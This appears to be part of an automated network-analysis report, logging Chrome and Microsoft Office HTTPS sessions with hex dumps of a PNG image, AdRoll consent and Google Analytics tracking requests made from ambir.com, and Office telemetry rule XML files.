                                                                                                                                                                                              Age: 1096
                                                                                                                                                                                              Last-Modified: Wed, 29 Jul 2020 17:15:00 GMT
                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:33 UTC612INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 98 00 00 01 d0 08 06 00 00 00 9c 30 7c 54 00 00 46 b7 49 44 41 54 78 da ec 9d 5b 6c 5c 47 19 c7 47 71 5b 01 6a cb 03 2d a8 d9 99 b3 be a4 b5 89 51 aa 62 89 e4 cc cc 3a de 3d 9b 4b 9b 36 40 23 4b 50 de 00 55 08 21 28 42 26 21 e5 c1 69 bc 17 97 ab a0 8a 6a 10 42 bd 24 3e 67 f6 ec da 25 14 28 0d 75 02 0f 48 08 54 a4 92 aa e4 a1 94 92 50 35 71 13 db bb 67 77 bd 89 bd cc d9 d8 84 48 ae 62 3b de 62 ef f9 ff a4 bf 66 bd 96 fc 64 9d 9f e6 fb be 33 43 00 00 00 00 b0 42 f4 f7 57 d7 59 df cd 6f 8c a7 bc 87 63 e9 d2 3e 6b a0 f0 4d 24 78 89 0e 4c ec df fa e8 78 22 f2 ad 7f ff 40 f6 9d 3e c4 fb 4e ff 5c c7 16 7d 6f 3e 27 fa ce fc 5a ec 3d f3 62 64 ef 5b 63 91 fd 67 8f 77 ec 39 7e 94 f2 e1 0c 13 ea b0 21 9d a7 0c
                                                                                                                                                                                              Data Ascii: PNGIHDR0|TFIDATx[l\GGq[j-Qb:=K6@#KPU!(B&!ijB$>g%(uHTP5qgwHb;bfd3CBWYoc>kM$xLx"@>N\}o>'Z=bd[cgw9~!
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: af 32 d3 dd d1 12 55 ed d4 54 ef 27 00 80 d5 df 8f f1 25 63 f9 92 49 43 32 c8 bb 08 e6 c1 13 57 04 53 f7 a8 ab 76 3f ec bf e2 c9 4d 50 91 7b 5b 7f f7 37 26 ec 17 b4 74 9e 08 0b f5 85 70 c4 fe f8 86 88 ba 9d 00 00 56 e3 4e 46 35 f5 a4 4a cd ba 16 ff 1d 2b 35 3d 6e 25 bd c0 3f 54 91 b9 24 97 2e 98 fa 8b 47 4b 87 bb 15 26 b3 05 2d 9e f3 fa bb 33 3a 27 28 b7 87 18 b7 bf dc 12 cd dd 7d 9b f8 d9 2d 04 00 b0 7a 76 32 b1 83 13 6d b1 54 e1 fb 56 aa 52 84 64 90 5a 92 de 0a 08 a6 fe e2 61 7e 8f 47 8e 78 7a bd 10 e2 ea 4d fd fd 4b 54 b8 07 98 50 bb 9b b7 0c 37 13 00 c0 ea e8 c9 58 e9 e2 68 3c 7d d1 83 64 90 9a 60 0e 4e 55 3b 3e 7d 7c 5e 30 6b 23 22 53 31 e4 c8 94 5e cf 69 d1 bc c2 b8 33 4c fd 72 9a 39 7c 4f 73 cf d8 fb 08 00 e0 ff 53 2e 8b 3e 56 b9 3b fe 78 79 34 9e
                                                                                                                                                                                              Data Ascii: 2UT'%cIC2WSv?MP{[7&tpVNF5J+5=n%?T$.GK&-3:'(}-zv2mTVRdZa~GxzMKTP7Xh<}d`NU;>}|^0k#"S1^i3Lr9|OsS.>V;xy4
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: 1c c7 eb a1 05 b5 50 2f 22 24 33 bb c9 f6 66 11 c1 1e da 9d d9 6d b3 ef 4d a3 a9 88 62 0d 68 11 73 2b ea ad 08 4a f1 90 25 ec bc 97 58 4f 95 1e 8a 27 2d 68 f6 cd 26 22 82 7f ea 41 14 a4 28 f1 4f 63 d3 d2 7a 10 5b 28 36 91 98 ec ee bc 9d cd a6 19 67 77 b3 61 b5 08 ad 79 49 76 77 be 1f f8 5e e7 f8 3e bc f9 fe de 7b c8 5d 24 62 4e 96 75 23 7b 3e 7a 50 c4 db fa b7 58 b0 73 e9 8e 8b cb 0d b9 40 30 40 a9 64 68 26 3f 44 79 e9 37 82 5d 4c 8b 0a e6 b3 d0 2f e6 2d 9b e4 c4 b2 66 e4 ae 44 8d ec 91 76 94 4b 57 fc ac a1 19 ce 74 a3 73 81 60 80 32 06 d3 33 3b fa 32 c5 21 62 97 7e 21 4c 56 42 bf a0 b7 a8 60 62 10 4c 6b c7 74 aa bd cc 5c 4f d2 39 a1 c5 c5 bd 6d d3 b9 90 da ce e5 92 b6 ba 73 81 60 80 42 b9 f8 3b a9 5d 3c 61 71 ef 77 ca dd 95 d0 2f e6 10 0c b2 9e 98 a2 fa
                                                                                                                                                                                              Data Ascii: P/"$3fmMbhs+J%XO'-h&"A(Ocz[(6gwayIvw^>{]$bNu#{>zPXs@0@dh&?Dy7]L/-fDvKWts`23;2!b~!LVB`bLkt\O9ms`B;]<aqw/
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: 44 40 08 11 51 54 b5 bc 20 a8 2a fa 00 02 2a f5 01 26 b1 cf 99 49 82 80 52 2e 02 a9 05 71 49 76 67 d7 01 04 08 68 41 a8 20 48 69 10 f0 82 40 50 89 a2 f0 40 44 c1 8e e7 ba 8e ed e9 99 43 56 aa 2a 23 bc f6 da 3b 76 fe 3f e9 af 5d c9 6f 5e ef f9 f9 fb be 73 ce b4 4a d6 1a 1b f0 af d9 e0 36 3e 64 6e 82 05 15 99 4a 30 a8 60 10 08 06 b4 0e 13 fe 6a ea c4 bb 98 88 27 a8 08 b0 a0 22 53 b5 c8 50 c1 20 10 0c 68 8d b2 9d 9e 40 79 f0 7b ca a3 af a5 64 b0 98 22 68 91 21 10 0c 68 0f 4c 84 9b a9 93 bc c7 1c b4 c6 10 08 06 81 60 40 9b a0 83 f1 0a 4b 84 8f 51 11 1d c2 75 30 08 04 83 40 30 a0 2d 6c 7a e0 b3 63 ca 83 fe 6f 98 93 7c c1 d0 1a 43 20 18 04 82 01 ed 82 39 e1 c5 54 24 2f 61 ee 82 40 30 08 04 03 da 38 d8 1f 3e 85 89 70 2b 13 c9 41 9c 79 41 a6 2b 98 73 af 78 35 25
                                                                                                                                                                                              Data Ascii: D@QT **&IR.qIvghA Hi@P@DCV*#;v?]o^sJ6>dnJ0`j'"SP h@y{d"h!hL`@KQu0@0-lzco|C 9T$/a@08>p+AyA+sx5%
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: cd 76 59 5e 04 43 07 46 a8 12 cc 22 20 7b f4 73 b6 cb 0c 5b 99 21 18 30 0d 2e 77 e2 95 59 0b 86 89 70 02 5b 93 3b 1c 11 1e 96 4b f2 26 e5 e1 45 5b bc 96 17 65 d5 2e a3 4e fc 76 53 32 39 98 c1 48 c1 f8 8b 45 30 4d c9 1c 47 f4 ea 63 78 c0 19 04 03 7e 00 53 8c 5e 65 39 c9 fb 18 ee 77 5e 2e 6a e6 c2 a3 ba 65 27 67 17 6c bb ab 30 23 9a 33 99 b8 39 93 e9 74 05 13 98 5b 47 98 12 cc 22 62 6d b6 95 d9 a8 ed 94 99 84 64 20 18 30 05 e5 87 d2 13 28 f7 ef 66 3c c2 70 bf 93 11 91 8a 29 82 3f 96 ed d1 d3 0b b3 47 b5 cb 4c 1e be 65 b9 87 d4 4c a6 a3 82 e1 81 12 cc 62 dc 7d 49 8a 95 3b 88 51 1b c7 36 66 08 06 fc 1f 8c 07 6b 2c 11 0d 51 07 cf db ef e4 7f f9 b2 d2 98 90 ef ef 2f db c3 a7 b4 f5 f3 bd 47 49 a6 39 93 81 60 e6 08 4d af dc a6 19 f5 31 9c fc 87 60 c0 61 d2 34 5d
                                                                                                                                                                                              Data Ascii: vY^CF" {s[!0.wYp[;K&E[e.NvS29HE0MGcx~S^e9w^.je'gl0#39t[G"bmd 0(f<p)?GLeLb}I;Q6fk,Q/GI9`M1`a4]
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: e7 49 5d 97 1d a9 60 9a 46 0a 46 cb e5 1d 25 97 ca 0f dd 7d 90 0b 04 93 5e f4 10 1d f5 9a ef 63 b9 65 82 c1 3e 0f 6a d1 87 54 07 fb 29 c5 7e 3e 0a fe 03 9d c9 9c 8c 60 28 13 77 9b 26 98 ae 05 3a 73 d9 85 cc 05 82 49 3d c4 11 8b a9 d7 f8 02 82 49 ee 8d 17 ca e4 06 aa 1f 10 4b 37 77 3e df ce 64 5a 13 10 cc 24 72 e9 1b 46 e6 02 c1 98 b1 9e bf c0 c4 43 94 05 fb 21 98 24 aa 97 20 b4 59 50 25 83 ad 52 8f 9a 35 ca 18 00 8d 32 19 47 7c 79 5c c9 44 95 9d 16 4c c3 18 c1 64 73 95 59 c8 5c 20 18 63 b8 8b 87 17 13 b7 ee 10 2e 6b 68 51 4e 26 7b a1 4c 8e 50 16 5e 62 58 ae a7 24 53 d7 99 cc e4 82 91 4d e2 89 c5 5a 30 06 04 fa dd f9 ca 77 c8 5c 20 18 63 b8 7d b0 7a 3d 71 e5 3a ec 1f 8b fd b4 ff d0 ab d4 6d 14 75 f5 62 18 0b d7 2a c9 b8 62 3b f5 c6 5b 93 5c 91 8d 1f 11 4c
                                                                                                                                                                                              Data Ascii: I]`FF%}^ce>jT)~>`(w&:sI=IK7w>dZ$rFC!$ YP%R52G|y\DLdsY\ c.khQN&{LP^bX$SMZ0w\ c}z=q:mub*b;[\L
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: 99 f8 88 e4 ca 6b 1b 67 6f ba f2 84 00 d0 73 81 08 98 4c 86 4a 39 45 a2 74 ed 88 28 21 60 cc b9 07 59 74 d0 53 d1 b7 c6 78 04 82 00 d2 b0 2c d6 98 67 41 cf 05 22 60 cc 41 f4 85 4b 45 5f ec 18 02 c6 a4 5b f4 57 84 7b c5 8a e8 b2 b2 1d 58 a2 9c 9e 4b 91 35 ea b9 04 11 2e 30 ae d5 c9 06 ac 0e f6 81 00 78 67 30 91 c5 14 2e 1d 58 a2 6c ce 23 92 29 ac 3b 45 5f 48 8c 3f f6 17 a4 57 b8 c4 7b 2e 08 17 38 6a 06 73 95 5e 37 09 80 37 60 fa 57 88 52 f8 37 04 8c 39 4b 94 45 29 f6 5d 49 65 78 a6 00 d2 2a 5c d0 73 81 e3 04 4c c8 e6 54 3f 11 00 6f c0 84 5f 15 bd d1 93 08 18 93 1a fc 52 74 27 95 c8 a6 0a 20 3d c2 a5 38 30 c7 52 20 ff 8a 70 81 e3 04 4c 38 cb a9 79 05 c0 07 0d 8a ab c8 53 08 98 54 8d e8 1e 6f f8 06 f9 a1 cb d7 ff 94 00 d2 20 5c d8 9c a9 76 f6 13 7a 2e f0 0e
                                                                                                                                                                                              Data Ascii: kgosLJ9Et(!`YtSx,gA"`AKE_[W{XK5.0xg0.Xl#);E_H?W{.8js^77`WR79KE)]Iex*\sLT?o_Rt' =80R pL8ySTo \vz.
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: 17 b7 dd 21 e4 02 00 08 86 c4 9c b9 8c f9 3b 72 01 00 04 43 e2 c4 ed 34 e9 8c 0f 0e 0e b2 2c 06 00 08 86 c4 ad b9 38 c8 05 00 10 0c 89 26 17 6a 2e 00 80 60 48 f4 65 31 6a 2e 00 80 60 48 f4 99 0b 35 17 00 40 30 a4 34 72 61 e6 02 00 08 86 44 af b9 48 3a 8c 5c 20 90 65 d9 fc 04 00 c1 90 18 cf b9 b0 5b 0c a6 09 67 cc 59 30 db 3b 3a 3a 16 25 00 08 86 b0 15 19 62 d1 d7 d7 57 ef d3 1b c6 fd 2a 86 26 24 03 08 86 50 73 81 28 b4 b5 b5 2d 93 74 73 78 78 38 ec 28 9c 70 ff 38 c9 a9 d9 80 60 c8 1f d5 5c 24 3d f2 a9 c8 d4 5c e0 07 cd cd cd f3 dc 37 4e 85 ad ea df cf a0 2b 48 9a 70 1a 99 c9 00 82 21 bf 4c f8 df 53 73 81 62 a4 69 ba de e3 73 34 88 25 f4 95 19 92 79 e3 ef 27 98 c9 00 82 21 b9 91 34 15 17 70 cf 38 4b 13 80 ef 84 9b 0d f7 91 8b 33 e4 32 4b 32 1e b3 af 79 83
                                                                                                                                                                                              Data Ascii: !;rC4,8&j.`He1j.`H5@04raDH:\ e[gY0;::%bW*&$Ps(-tsxx8(p8`\$=\7N+Hp!LSsbis4%y'!4p8K32K2y
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: 4d 91 fd f2 9d 6b 59 ee f6 7a 3a bc bf 7c bb d5 63 7f 09 91 f9 c0 63 c5 5a 44 06 43 60 a0 e4 29 cd 3e 1e 77 1f e8 f5 40 7a 5f 5f 5f df f2 9e 9e 9e cb 33 19 84 c5 2c b3 97 b7 c5 ed 73 50 d2 29 b7 55 bd ff 28 09 91 19 71 3f 59 83 c8 60 08 0c 94 9c 9f c9 e7 13 26 24 ed 77 8e e1 09 7b 35 2b f3 93 01 ea 69 20 89 12 2f 8d 21 2c 16 da 47 25 bd 67 fe cc 4f 92 a8 fb 7e 52 10 19 49 c3 23 23 23 eb 10 19 0c 81 81 b9 78 34 53 3e 7e 22 69 bb 69 1d 1d 1d 5d 9a f7 6a 2e aa d5 bd 5a 62 ca b1 eb b8 35 d9 63 79 d2 9f 7d 50 d2 1f 08 4b d1 75 32 39 1f 87 c3 93 61 da 3b 86 c0 c0 5c a7 36 07 87 dd 37 de 70 1f 79 cc ac 8d 15 eb 31 fb 2c 06 96 1a d8 17 bf d1 9f e9 6a 49 77 f8 73 ef 8c 15 ec 92 72 f1 d9 f9 3e 94 24 32 43 ee 0f ab f1 64 30 04 06 e6 2c 34 81 a4 d3 ee 27 df 98 d7 25
                                                                                                                                                                                              Data Ascii: MkYz:|ccZDC`)>w@z___3,sP)U(q?Y`&$w{5+i /!,G%gO~RI###x4S>~"ii]j.Zb5cy}PKu29a;\67py1,jIwsr>$2Cd0,4'%
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1390INData Raw: fd e5 44 34 46 20 10 8c e6 ff 5e 06 f8 7b b6 b9 96 c5 ae 15 9f 35 76 59 c1 a1 d7 8b 82 0d cd 64 56 f7 63 fb 32 00 71 3b 73 b1 05 73 9e fb 9f 10 d1 38 81 40 30 ba e5 c2 1c e5 fe 0a b7 5c ae 9d 59 79 d6 b8 0f 0a 9b df 2d 32 ea 7f 97 2a 84 33 32 00 c4 a1 5c 78 59 fc 22 f7 f3 89 28 45 20 10 8c 07 72 f9 83 bf 5f 3a 11 4d 16 37 98 d4 cf ac 94 74 df c1 2c bf 51 7f 9c 54 15 24 03 40 7c cd 5c da b9 f5 0f 8f 7d 04 82 d1 5d 73 b1 e5 c2 fd 8c 91 fc 82 3d 99 dd 39 31 a3 e8 e0 ea 52 d9 70 5c aa ca 41 48 06 80 b8 98 b9 74 70 3f 10 0c 06 ef 17 08 04 e3 45 cd c5 96 4b 20 10 98 22 46 98 39 9f 76 dd b3 d2 df bc 76 9b b1 eb 94 54 38 ed 0f c0 28 97 4b 27 b7 c1 48 24 f2 80 40 20 18 0f 96 c5 6c b9 ac 70 e4 a2 23 4f e7 74 df 9b e9 fb 65 3d 4b e6 0c 99 21 cc 64 00 18 85 72 61 ba
                                                                                                                                                                                              Data Ascii: D4F ^{5vYdVc2q;ss8@0\Yy-2*32\xY"(E r_:M7t,QT$@|\}]s=91Rp\AHtp?EK "F9vvT8(K'H$@ lp#Ote=K!dra


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              121192.168.2.54986454.255.252.1684431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:32 UTC665OUTGET /consent/check/GXXT3DJJNNBKHGBC62RAND?flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&_s=a60e6a62d132d36d1465029b174eaecd&_b=2 HTTP/1.1
                                                                                                                                                                                              Host: d.adroll.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:33 UTC1047INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Content-Length: 582
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Set-Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:33 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:33 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:33 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=adroll.com
                                                                                                                                                                                              Set-Cookie: __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:33 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=adroll.com
                                                                                                                                                                                              2024-11-20 20:28:33 UTC582INData Raw: 77 69 6e 64 6f 77 2e 61 64 72 6f 6c 6c 5f 65 78 70 5f 6c 69 73 74 20 3d 20 5b 5d 3b 20 77 69 6e 64 6f 77 2e 5f 5f 61 64 72 6f 6c 6c 5f 75 72 6c 5f 63 61 74 65 67 6f 72 79 20 3d 20 22 70 72 6f 64 75 63 74 5f 70 61 67 65 22 3b 20 5f 5f 61 64 72 6f 6c 6c 2e 73 65 74 5f 63 6f 6e 73 65 6e 74 28 74 72 75 65 2c 20 66 61 6c 73 65 2c 20 66 61 6c 73 65 2c 20 22 55 53 22 2c 20 22 55 53 22 2c 20 7b 22 61 72 63 6f 6e 73 65 6e 74 22 3a 6e 75 6c 6c 2c 22 65 75 63 6f 6e 73 65 6e 74 22 3a 6e 75 6c 6c 2c 22 70 75 72 70 6f 73 65 73 22 3a 6e 75 6c 6c 2c 22 65 75 63 6f 6f 6b 69 65 22 3a 6e 75 6c 6c 2c 22 62 61 6e 6e 65 72 22 3a 22 62 61 6e 6e 65 72 5f 64 65 63 6c 69 6e 65 64 22 2c 22 69 70 67 65 6f 22 3a 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65
                                                                                                                                                                                              Data Ascii: window.adroll_exp_list = []; window.__adroll_url_category = "product_page"; __adroll.set_consent(true, false, false, "US", "US", {"arconsent":null,"euconsent":null,"purposes":null,"eucookie":null,"banner":"banner_declined","ipgeo":{"country_code":"US","re


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              122192.168.2.54987366.102.1.1554431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:32 UTC919OUTPOST /g/collect?v=2&tid=G-5NGH3KRVGD&cid=59994235.1732134501&gtm=45be4bj0v9180601725za200&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=101925629~102067555~102067808~102077855~102081485 HTTP/1.1
                                                                                                                                                                                              Host: stats.g.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Origin: https://ambir.com
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
                                                                                                                                                                                              2024-11-20 20:28:33 UTC840INHTTP/1.1 204 No Content
                                                                                                                                                                                              Access-Control-Allow-Origin: https://ambir.com
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:111:0
                                                                                                                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                              Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:111:0"}],}
                                                                                                                                                                                              Server: Golfe2
                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              123192.168.2.54986713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                              x-ms-request-id: fdab78a3-101e-005a-1d8c-3a882b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202833Z-1777c6cb754xlpjshC1TEBv8cc0000000a9g00000000516q
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              124192.168.2.54986913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:33 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:33 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                              x-ms-request-id: ac667451-e01e-003c-3e8c-3ac70b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202833Z-r1d97b99577ckpmjhC1TEBrzs000000009eg000000006ad5
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:33 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              125192.168.2.549866172.217.21.364431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
